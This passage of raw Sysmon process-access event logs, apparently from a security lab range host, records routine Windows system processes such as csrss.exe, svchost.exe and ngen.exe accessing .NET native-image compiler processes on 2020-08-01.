C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.163","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2240-5F25-0000-00109E000C00}","TargetProcessId":"2508","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7184,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.163\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2240-5F25-0000-00109E000C00}\r\nTargetProcessId: 2508\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.163","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2240-5F25-0000-00109E000C00}","TargetProcessId":"2508","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7185,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.616\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2240-5F25-0000-0010F3030C00}\r\nTargetProcessId: 4632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.616","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2240-5F25-0000-0010F3030C00}","TargetProcessId":"4632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7186,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.616\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2240-5F25-0000-0010F3030C00}\r\nTargetProcessId: 4632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.616","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2240-5F25-0000-0010F3030C00}","TargetProcessId":"4632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7187,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.616\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2240-5F25-0000-0010F3030C00}\r\nTargetProcessId: 4632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.616","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2240-5F25-0000-0010F3030C00}","TargetProcessId":"4632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7188,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.663\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2241-5F25-0000-0010F3070C00}\r\nTargetProcessId: 3776\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.663","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2241-5F25-0000-0010F3070C00}","TargetProcessId":"3776","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7189,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.663\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2241-5F25-0000-0010F3070C00}\r\nTargetProcessId: 3776\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.663","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2241-5F25-0000-0010F3070C00}","TargetProcessId":"3776","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7190,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.663\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2241-5F25-0000-0010F3070C00}\r\nTargetProcessId: 3776\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.663","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2241-5F25-0000-0010F3070C00}","TargetProcessId":"3776","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7191,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.695\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2248-5F25-0000-0010D66A0C00}\r\nTargetProcessId: 4896\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 